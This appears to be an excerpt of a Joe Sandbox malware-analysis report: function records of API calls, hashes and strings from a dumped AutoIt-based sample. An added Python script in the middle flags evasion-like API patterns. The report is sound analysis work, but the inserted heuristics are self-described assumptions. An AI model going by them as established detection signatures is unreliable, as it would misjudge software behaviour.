                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                        • Instruction ID: 7d49baf581dffe8f635a42ffdbc740a7830a6b862966e1c20fc1835888840d1f
                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                        • Instruction Fuzzy Hash: E8017B3200064EBBCF135E84DC62CEE3F66BB18352B598914FE1859031C232EAB5AB81
                                        APIs
                                          • Part of subcall function 0034869D: __getptd_noexit.LIBCMT ref: 0034869E
                                        • __lock.LIBCMT ref: 0034811F
                                        • InterlockedDecrement.KERNEL32(?), ref: 0034813C
                                        • _free.LIBCMT ref: 0034814F
                                        • InterlockedIncrement.KERNEL32(017D3588), ref: 00348167
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                        • String ID:
                                        • API String ID: 2704283638-0
                                        • Opcode ID: 1db4bb771325b55640b21dd0fe31a1f832f9bf2b855ba471c9acf958078e297e
                                        • Instruction ID: 94d1ac843da9e5597718b70d6cb7eb5f1914754855a94eba2188a5d10439521b
                                        • Opcode Fuzzy Hash: 1db4bb771325b55640b21dd0fe31a1f832f9bf2b855ba471c9acf958078e297e
                                        • Instruction Fuzzy Hash: 40016D76906A119BCB53AF65A8067ADB7E4BF05710F06041AF4156F791CF247842CBD2
                                        APIs
                                        • __lock.LIBCMT ref: 00348768
                                          • Part of subcall function 00348984: __mtinitlocknum.LIBCMT ref: 00348996
                                          • Part of subcall function 00348984: RtlEnterCriticalSection.NTDLL(00340127), ref: 003489AF
                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00348775
                                        • __lock.LIBCMT ref: 00348789
                                        • ___addlocaleref.LIBCMT ref: 003487A7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1687444384-0
                                        • Opcode ID: 20d9b11b4cbec5ee65331d1d55c1f0dc28411eafa5f9aa70f7f31b45395b984f
                                        • Instruction ID: 581f65e78f722df173b8f05f86badb687d7d1159d297d91346e2b4a5683838d4
                                        • Opcode Fuzzy Hash: 20d9b11b4cbec5ee65331d1d55c1f0dc28411eafa5f9aa70f7f31b45395b984f
                                        • Instruction Fuzzy Hash: A2016976415B009FE762EF65D90675AFBE0EF40325F20890EE0AA9F6A0CB70B640CB01
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00369C7F
                                          • Part of subcall function 0036AD14: _memset.LIBCMT ref: 0036AD49
                                        • _memmove.LIBCMT ref: 00369CA2
                                        • _memset.LIBCMT ref: 00369CAF
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00369CBF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                        • String ID:
                                        • API String ID: 48991266-0
                                        • Opcode ID: f47a0160d8b3ceb53f9590e06354087be91528bedd25d0f3eefa52b9c28f2f12
                                        • Instruction ID: a51218281d36e785a7aaf715f9e93d1aada2b0a019a780f866a07ace87cc689e
                                        • Opcode Fuzzy Hash: f47a0160d8b3ceb53f9590e06354087be91528bedd25d0f3eefa52b9c28f2f12
                                        • Instruction Fuzzy Hash: 4AF0307A200000ABCF026F54EC85A49BB29EF45310F08C051FE099E217C731A811DBB5
                                        APIs
                                          • Part of subcall function 0033B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0033B5EB
                                          • Part of subcall function 0033B58B: SelectObject.GDI32(?,00000000), ref: 0033B5FA
                                          • Part of subcall function 0033B58B: BeginPath.GDI32(?), ref: 0033B611
                                          • Part of subcall function 0033B58B: SelectObject.GDI32(?,00000000), ref: 0033B63B
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0038E860
                                        • LineTo.GDI32(00000000,?,?), ref: 0038E86D
                                        • EndPath.GDI32(00000000), ref: 0038E87D
                                        • StrokePath.GDI32(00000000), ref: 0038E88B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: 57b295fd4fe324a8fdc6490239b2279e8854625bd9ac5950bd230065d013e5ec
                                        • Instruction ID: f315361aec3e20e42220b363aacce704e3a25530d6cdd6df2a3b28662908b63d
                                        • Opcode Fuzzy Hash: 57b295fd4fe324a8fdc6490239b2279e8854625bd9ac5950bd230065d013e5ec
                                        • Instruction Fuzzy Hash: 26F05E31001269BADB136F54AC09FCE3F9DAF06711F048241FA12650E187759552CF95
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0035D640
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0035D653
                                        • GetCurrentThreadId.KERNEL32 ref: 0035D65A
                                        • AttachThreadInput.USER32(00000000), ref: 0035D661
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: 83a6bdc302321408c0836ac433ae1b2c001a4e35be53fc5ed91661b22ec3c506
                                        • Instruction ID: 60779724b404159bc1401fe711f8a269466289b4e41a7e1dda97ffd498433d7c
                                        • Opcode Fuzzy Hash: 83a6bdc302321408c0836ac433ae1b2c001a4e35be53fc5ed91661b22ec3c506
                                        • Instruction Fuzzy Hash: D4E06D71141228BADB221FA2DC0DEDB7F1CEF227A2F808010B90E85870CA71D585CBE0
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 0033B0C5
                                        • SetTextColor.GDI32(?,000000FF), ref: 0033B0CF
                                        • SetBkMode.GDI32(?,00000001), ref: 0033B0E4
                                        • GetStockObject.GDI32(00000005), ref: 0033B0EC
                                        • GetWindowDC.USER32(?,00000000), ref: 0039ECFA
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0039ED07
                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0039ED20
                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0039ED39
                                        • GetPixel.GDI32(00000000,?,?), ref: 0039ED59
                                        • ReleaseDC.USER32(?,00000000), ref: 0039ED64
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                        • String ID:
                                        • API String ID: 1946975507-0
                                        • Opcode ID: b66d998b7ab04eedbc52c723df44f377fec338935a19ffc99166fe2b1b2b079e
                                        • Instruction ID: a35cad4f9d0e8d72d80fb4b3f5e7d555b1185eb954f66f4b1290d5789a9eb7bd
                                        • Opcode Fuzzy Hash: b66d998b7ab04eedbc52c723df44f377fec338935a19ffc99166fe2b1b2b079e
                                        • Instruction Fuzzy Hash: AEE0ED71500240AEEF635F78AC497987B25AB56335F148266F76A580E2C7724581DB11
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: b22fc8877a404c67e0b61aa2708b5926a463f325175455ad4d30372159f542b6
                                        • Instruction ID: 71b356ab4629da56e4ba3cc7e193debeb2faaa88bfd839e1e94be4d33ff607e7
                                        • Opcode Fuzzy Hash: b22fc8877a404c67e0b61aa2708b5926a463f325175455ad4d30372159f542b6
                                        • Instruction Fuzzy Hash: 92E04FB1500200EFDB025F70DC486697BADEB4D350F11C405FC4B8BA60DB7499818B00
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: eb56a0e163ac0075c8e94b122f9c1d5e7c9f0178e47034250c3ea829e8185542
                                        • Instruction ID: b1aa527b3db67e7a5063d90cece492efbb60274ac77ff710cac8514c83b75586
                                        • Opcode Fuzzy Hash: eb56a0e163ac0075c8e94b122f9c1d5e7c9f0178e47034250c3ea829e8185542
                                        • Instruction Fuzzy Hash: 6FE046B1900200EFDB029F70DC886A97BADEB4D360F11C405F94B8BA60DBB899818B00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: >$DEFINE
                                        • API String ID: 4104443479-1664449232
                                        • Opcode ID: cf37183ada476ab01b0bd47d4f2eebdfe26c35fee01d41d588de59e47d004aee
                                        • Instruction ID: e92815e4499bce4fb69c5227ee99dba1275ade144a4bbee4e92381156b9b140a
                                        • Opcode Fuzzy Hash: cf37183ada476ab01b0bd47d4f2eebdfe26c35fee01d41d588de59e47d004aee
                                        • Instruction Fuzzy Hash: 78127C75E0021ADFCF26CF59D490AADB7B1FF4A310F26815AE855AB350D730AD85CB90
                                        APIs
                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0035ECA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ContainedObject
                                        • String ID: AutoIt3GUI$Container
                                        • API String ID: 3565006973-3941886329
                                        • Opcode ID: 4ede4ad28b70cf2c5d980f4e4d4abbfd09c0383b043432c86562011e48198bc8
                                        • Instruction ID: 92062f43ad0dacb9f167f73184c29cd2239dad32b59f747f6e698d9d67fc8d87
                                        • Opcode Fuzzy Hash: 4ede4ad28b70cf2c5d980f4e4d4abbfd09c0383b043432c86562011e48198bc8
                                        • Instruction Fuzzy Hash: 039167746003019FDB19CF64C884E6ABBF9BF48712B14846EED4ACF6A1DBB0E944CB50
                                        APIs
                                          • Part of subcall function 00323BCF: _wcscpy.LIBCMT ref: 00323BF2
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • __wcsnicmp.LIBCMT ref: 0036E785
                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0036E84E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                        • String ID: LPT
                                        • API String ID: 3222508074-1350329615
                                        • Opcode ID: 0440bb1fcfc792cbdbef0b1a4094ad7e030043fd0bfc1c109432d4339af59b5b
                                        • Instruction ID: 434954db0fe2f36ded8a1ec8765c833ba86b3ca5da2b8d2b796ae42f793bfd86
                                        • Opcode Fuzzy Hash: 0440bb1fcfc792cbdbef0b1a4094ad7e030043fd0bfc1c109432d4339af59b5b
                                        • Instruction Fuzzy Hash: F4617279A00225AFCB16DF94C895EEEB7F8EF09710F058069F506AB391DB70AE44CB50
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00321B83
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00321B9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: 94210f99c6ecfb0a4d4776db99add9111e92410fbd2ba55e9c9e0a200a952589
                                        • Instruction ID: 2b60d8e228b8ef541367a4fa47fa6cb5dcc816ab22f740d8b6d15f7042a0ffc5
                                        • Opcode Fuzzy Hash: 94210f99c6ecfb0a4d4776db99add9111e92410fbd2ba55e9c9e0a200a952589
                                        • Instruction Fuzzy Hash: 8F513A72408744ABE322AF14D885BAFBBECFF99354F41484DF1C8450A6EB71956CC762
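The function records on this page are machine-generated: each one lists the Win32/CRT calls a function makes (directly, or "Part of subcall function" for indirect ones), then the similarity identifiers. When a report runs to thousands of these records, reading them by hand is impractical. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses that record layout and flags functions whose API set matches a small set of triage rules. The sample input is excerpted from records shown above (whitespace trimmed, "Associated" lines omitted); the rules themselves are my own heuristics and an assumption about what is worth a second look (for instance GlobalMemoryStatusEx next to Sleep as a RAM-size/timing check), not Joe Sandbox's signature logic.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample: three records excerpted from the report above.
SAMPLE = """\
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0035D640
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0035D653
• GetCurrentThreadId.KERNEL32 ref: 0035D65A
• AttachThreadInput.USER32(00000000), ref: 0035D661
Memory Dump Source
• Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 83a6bdc302321408c0836ac433ae1b2c001a4e35be53fc5ed91661b22ec3c506
APIs
• Sleep.KERNEL32(00000000), ref: 00321B83
• GlobalMemoryStatusEx.KERNEL32 ref: 00321B9C
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• Opcode ID: 94210f99c6ecfb0a4d4776db99add9111e92410fbd2ba55e9c9e0a200a952589
APIs
  • Part of subcall function 00323BCF: _wcscpy.LIBCMT ref: 00323BF2
• __wcsnicmp.LIBCMT ref: 0036E785
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0036E84E
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• Opcode ID: 0440bb1fcfc792cbdbef0b1a4094ad7e030043fd0bfc1c109432d4339af59b5b
"""

# One API line: optional subcall prefix, Name.MODULE, optional (args), ", ref: ADDR".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
# Any other "Key: value" bullet (Opcode ID, String ID, Source File, ...).
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+):\s*(?P<val>.*)$")

# Hypothetical triage rules (my assumption): every API in the set must
# appear in the same function record for the label to fire.
RULES: Dict[str, Set[str]] = {
    "RAM-size + Sleep check (sandbox-detection candidate)": {"GlobalMemoryStatusEx", "Sleep"},
    "attaches to another thread's input queue (focus/keystroke control)":
        {"AttachThreadInput", "GetWindowThreadProcessId"},
    "maps a network resource via WNet": {"WNetUseConnectionW"},
    "reads screen pixels from a window DC": {"GetWindowDC", "GetPixel"},
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    via_subcall: Optional[str]  # address of the intermediate function, if indirect


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)

    def api_names(self, include_subcalls: bool = True) -> Set[str]:
        return {a.name for a in self.apis if include_subcalls or a.via_subcall is None}


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text on 'APIs' headings and collect each record's calls and metadata."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":  # every record starts with this heading
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            current.apis.append(ApiCall(m["name"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
            continue
        m = KV_RE.match(line)
        if m:  # section headings without a colon (Strings, Similarity, ...) are skipped
            current.meta[m["key"]] = m["val"]
    return records


def triage(records: List[FunctionRecord], rules: Dict[str, Set[str]] = RULES) -> List[Tuple[str, str]]:
    """Return (opcode-id prefix, label) for every record whose API set satisfies a rule."""
    hits: List[Tuple[str, str]] = []
    for rec in records:
        names = rec.api_names()
        ident = rec.meta.get("Opcode ID", "?")[:12]
        for label, required in rules.items():
            if required <= names:
                hits.append((ident, label))
    return hits


if __name__ == "__main__":
    for ident, label in triage(parse_records(SAMPLE)):
        print(f"{ident}  {label}")
```

To run this over a full report, paste the exported function listing into a file and feed its contents to `parse_records`; the `via_subcall` field lets you decide whether an indirect call (for example `_wcscpy` reached through `00323BCF`) should count toward a rule or not.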
                                        APIs
                                          • Part of subcall function 0032417D: __fread_nolock.LIBCMT ref: 0032419B
                                        • _wcscmp.LIBCMT ref: 0036CF49
                                        • _wcscmp.LIBCMT ref: 0036CF5C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscmp$__fread_nolock
                                        • String ID: FILE
                                        • API String ID: 4029003684-3121273764
                                        • Opcode ID: df33907ff99a6c6609cf3b496315f25b67b8ae62e3d730cb07ac6a815a937e88
                                        • Instruction ID: c3f4f0c7be9fc4ca19298d9f4fdbdcc630cc1e5efbb9f230fd1034613e71d118
                                        • Opcode Fuzzy Hash: df33907ff99a6c6609cf3b496315f25b67b8ae62e3d730cb07ac6a815a937e88
                                        • Instruction Fuzzy Hash: 9841E332A00219BADF22DBA4DC81FEF7BBA9F49710F004469F601EF195D771AA54C760
                                        APIs
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        • __getbuf.LIBCMT ref: 00349B8A
                                        • __lseeki64.LIBCMT ref: 00349BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
